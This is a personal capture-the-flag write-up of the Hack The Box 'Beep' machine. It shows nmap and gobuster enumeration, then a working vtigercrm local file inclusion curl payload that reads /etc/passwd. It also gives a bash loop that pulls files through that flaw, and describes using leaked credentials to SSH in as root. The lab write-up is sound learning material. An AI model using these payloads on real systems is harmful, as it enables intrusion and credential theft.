Beep
Enumeration
Let's start out by enumerating the box and finding out what we are dealing with.
1# Nmap 7.92 scan initiated Mon Jan 3 16:51:21 2022 as: nmap -sC -sV -oA nmap/scan -v 10.10.10.7 2Nmap scan report for 10.10.10.7 3Host is up (0.021s latency). 4Not shown: 988 closed tcp ports (conn-refused) 5PORT STATE SERVICE VERSION 622/tcp open ssh OpenSSH 4.3 (protocol 2.0) 7| ssh-hostkey: 8| 1024 ad:ee:5a:bb:69:37:fb:27:af:b8:30:72:a0:f9:6f:53 (DSA) 9|_ 2048 bc:c6:73:59:13:a1:8a:4b:55:07:50:f6:65:1d:6d:0d (RSA) 1025/tcp open smtp Postfix smtpd 11|_smtp-commands: beep.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, ENHANCEDSTATUSCODES, 8BITMIME, DSN 1280/tcp open http Apache httpd 2.2.3 13|_http-server-header: Apache/2.2.3 (CentOS) 14| http-methods: 15|_ Supported Methods: GET HEAD POST OPTIONS 16|_http-title: Did not follow redirect to https://10.10.10.7/ 17110/tcp open pop3 Cyrus pop3d 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4 18|_pop3-capabilities: UIDL AUTH-RESP-CODE TOP USER IMPLEMENTATION(Cyrus POP3 server v2) RESP-CODES LOGIN-DELAY(0) APOP STLS EXPIRE(NEVER) PIPELINING 19111/tcp open rpcbind 2 (RPC #100000) 20| rpcinfo: 21| program version port/proto service 22| 100000 2 111/tcp rpcbind 23| 100000 2 111/udp rpcbind 24| 100024 1 875/udp status 25|_ 100024 1 878/tcp status 26143/tcp open imap Cyrus imapd 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4 27|_imap-capabilities: Completed STARTTLS OK ATOMIC URLAUTHA0001 LITERAL+ MAILBOX-REFERRALS THREAD=REFERENCES RENAME LIST-SUBSCRIBED SORT LISTEXT MULTIAPPEND ID NO X-NETSCAPE THREAD=ORDEREDSUBJECT ANNOTATEMORE UIDPLUS UNSELECT CHILDREN IMAP4rev1 CATENATE SORT=MODSEQ IDLE RIGHTS=kxte BINARY ACL IMAP4 NAMESPACE QUOTA CONDSTORE 28443/tcp open ssl/http Apache httpd 2.2.3 ((CentOS)) 29|_ssl-date: 2022-01-03T06:55:55+00:00; +1h01m05s from scanner time. 30|_http-server-header: Apache/2.2.3 (CentOS) 31| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=-- 32| Issuer: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=-- 33| Public Key type: rsa 34| Public Key bits: 1024 35| Signature Algorithm: sha1WithRSAEncryption 36| Not valid before: 2017-04-07T08:22:08 37| Not valid after: 2018-04-07T08:22:08 38| MD5: 621a 82b6 cf7e 1afa 5284 1c91 60c8 fbc8 39|_SHA-1: 800a c6e7 065e 1198 0187 c452 0d9b 18ef e557 a09f 40| http-methods: 41|_ Supported Methods: GET HEAD POST OPTIONS 42|_http-title: Elastix - Login page 43| http-robots.txt: 1 disallowed entry 44|_/ 45|_http-favicon: Unknown favicon MD5: 80DCC71362B27C7D0E608B0890C05E9F 46993/tcp open ssl/imap Cyrus imapd 47|_imap-capabilities: CAPABILITY 48995/tcp open pop3 Cyrus pop3d 493306/tcp open mysql MySQL (unauthorized) 50|_tls-alpn: ERROR: Script execution failed (use -d to debug) 51|_ssl-cert: ERROR: Script execution failed (use -d to debug) 52|_sslv2: ERROR: Script execution failed (use -d to debug) 53|_ssl-date: ERROR: Script execution failed (use -d to debug) 54|_tls-nextprotoneg: ERROR: Script execution failed (use -d to debug) 554445/tcp open upnotifyp? 5610000/tcp open http MiniServ 1.570 (Webmin httpd) 57| http-methods: 58|_ Supported Methods: GET HEAD POST OPTIONS 59|_http-favicon: Unknown favicon MD5: 74F7F6F633A027FA3EA36F05004C9341 60|_http-server-header: MiniServ/1.570 61|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1). 62Service Info: Hosts: beep.localdomain, 127.0.0.1, example.com 63 64Host script results: 65|_clock-skew: 1h01m04s 66 67Read data files from: /usr/bin/../share/nmap 68Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . 69# Nmap done at Mon Jan 3 16:57:54 2022 -- 1 IP address (1 host up) scanned in 393.30 seconds
Look to have quite a few ports open. Starting with http on port 80, we get redirected to the https on port 443 and are presented with a login screen.
Default credentials like admin:admin and admin:password won't work so instead I move onto a gobuster scan to try and increase the attack surface.
Gobuster Produced the following output:
Gobuster identifies a directory and navigating to this directory i get presented with an authentication prompt.
1bash
2gobuster dir -t 100 -u https://10.10.10.7 -x php -w /usr/share/wordlists/SecLists/Discovery/Web-Content/raft-small-words.txt -k -o gobuster
1bash
2┌──(tom㉿acer-computer)-[~/htb/beep]
3└─$ cat 10.10.10.7-gobuster
4/.html (Status: 403) [Size: 283]
5/admin (Status: 301) [Size: 309] [--> https://10.10.10.7/admin/]
6/help (Status: 301) [Size: 308] [--> https://10.10.10.7/help/]
7/.htm (Status: 403) [Size: 282]
8/.html.php (Status: 403) [Size: 287]
9/.htm.php (Status: 403) [Size: 286]
10/index.php (Status: 200) [Size: 1785]
11/config.php (Status: 200) [Size: 1785]
12/mail (Status: 301) [Size: 308] [--> https://10.10.10.7/mail/]
13/var (Status: 301) [Size: 307] [--> https://10.10.10.7/var/]
14/lang (Status: 301) [Size: 308] [--> https://10.10.10.7/lang/]
15/static (Status: 301) [Size: 310] [--> https://10.10.10.7/static/]
16/libs (Status: 301) [Size: 308] [--> https://10.10.10.7/libs/]
17/. (Status: 200) [Size: 1785]
18/panel (Status: 301) [Size: 309] [--> https://10.10.10.7/panel/]
19/themes (Status: 301) [Size: 310] [--> https://10.10.10.7/themes/]
20/modules (Status: 301) [Size: 311] [--> https://10.10.10.7/modules/]
21/.htaccess (Status: 403) [Size: 287]
22/register.php (Status: 200) [Size: 1785]
23/.htaccess.php (Status: 403) [Size: 291]
24/images (Status: 301) [Size: 310] [--> https://10.10.10.7/images/]
25/configs (Status: 301) [Size: 311] [--> https://10.10.10.7/configs/]
26/.htc (Status: 403) [Size: 282]
27/.htc.php (Status: 403) [Size: 286]
28/.html_var_DE (Status: 403) [Size: 290]
29/.html_var_DE.php (Status: 403) [Size: 294]
30/.htpasswd (Status: 403) [Size: 287]
31/.htpasswd.php (Status: 403) [Size: 291]
32/.html..php (Status: 403) [Size: 288]
33/.html. (Status: 403) [Size: 284]
34/.html.html.php (Status: 403) [Size: 292]
35/.html.html (Status: 403) [Size: 288]
36/recordings (Status: 301) [Size: 314] [--> https://10.10.10.7/recordings/]
37/.htpasswds (Status: 403) [Size: 288]
38/.htpasswds.php (Status: 403) [Size: 292]
39/.htm. (Status: 403) [Size: 283]
40/.htm..php (Status: 403) [Size: 287]
41/vtigercrm (Status: 301) [Size: 313] [--> https://10.10.10.7/vtigercrm/]
42<SNIP..>
/admin
Default credentials again do not work, might try brute forcing later if I dont have success anywhere else. Hitting cancel directs us to and says that we are unauthorised which makes me think we have some information disclosure on this page.
/admin/config.php
Clicking on the recording tab takes us to yet another page
This page says we are using FreePBX version 2.5 which is different to the last page which said we were using v2.8.1.4. Using gobuster on this page shows that a directory exists and navigating to this shows several files containing php code.
/modules
Going back to the nmap scan and notice another http service listening on port 10000. Navigating to this page we are presented with yet another login page. After attempting to login with default credentials, I get an error message saying that my IP has been blocked due to too many authentication failures.
Exploitation
With a lot of things to enumerate, I start with googling around for exploits for freepbx 2.8.1.4 as I don't have a version number for elastix running on port 443. I find a metasploit module and running this against the server does not result in a shell and gives a metasploit error saying exploit completed but no shell was created. So back to enumeration.
More enumeration
After reviewing the gobuster scan, the result peaks my interest. Navigating to this page shows yet another login page.
/vtigercrm
I notice the version the software and version number in the bottom left and throw that into google. I find this exploit on exploit db, which is a local file inclusion exploit, which works!!
1┌──(tom㉿acer-computer)-[~/htb/beep] 2└─$ curl "https://10.10.10.7/vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=../../../../../../../../etc/passwd%00" -k 3root:x:0:0:root:/root:/bin/bash 4<SNIP...> 5mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash 6<SNIP..> 7cyrus:x:76:12:Cyrus IMAP Server:/var/lib/imap:/bin/bash 8<SNIP...> 9asterisk:x:100:101:Asterisk VoIP PBX:/var/lib/asterisk:/bin/bash 10<SNIP..> 11spamfilter:x:500:500::/home/spamfilter:/bin/bash 12<SNIP..> 13fanis:x:501:501::/home/fanis:/bin/bash
From this we can identify the users spamfilter and fanis
Exploitation again
I attempted to use php filters to leak the website source code however I was unsuccessful. The only thing I was able to get was the user flag by doing however I feel this is sort of cheating as I am not actually the user yet. I create the following bash script in order to retrieve useful files from the server.
sortfieldsjson.php?module_name=../../../../../../../../home/fanis/user.txt%00
1#!/bin/bash 2 3for i in $(cat /usr/share/wordlists/SecLists/Fuzzing/LFI/LFI-gracefulsecurity-linux.txt) 4do 5 contents=$(curl "https://10.10.10.7/vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=../../../../../../../.."$i"%00" -k) 6 7 if [ $(echo $contents | wc -c) != 0 ] 8 then 9 echo $contents > $(echo $i| tr '/' '_').txt 10 fi 11done
Config files for website must be stored in a non standard location as i did not get any config files. At this point I refer to another walkthrough for a hint on where to go next
Hint - Elastix exploit/help
Looking at searchsploit results both the LFI and RCE exploits which look interesting. I start with the LFI as I had success with that before. The LFI example brings upa config page with users and passwords in it. I now have credentials for the asterisk user and admin. The password works and gets me into the admin portal.
I try to ssh into the machine as the asterisk user, no success. I try as root and am successful, allowing me to grab the root flag.
Review / Take aways
After doing some research on the box, it turns out there are multiple ways of exploiting it. Its useful to always look for help documents on the machine, as they can tell you version numbers or dates. The reason the php filters did not work was due to the position of the variable in the url in the backend.
e.g.
1 2@include("include/language/$language.lang.php");
When I get stuck, I should always go back a step in my enumeration process and see if there was a result I missed or a result I was going to review but forgot.
Even though language was never sanitised, because it comes after , adding a php filter would make it look like and would not show anything. If instead of "include" it was "get_file_contents" it would get the contents of the file and not execute any code.
include/language
include/language/php://......
I should have also checked the server for any ssh keys as that could have been an easy win.
Author: Thomas Karbowiak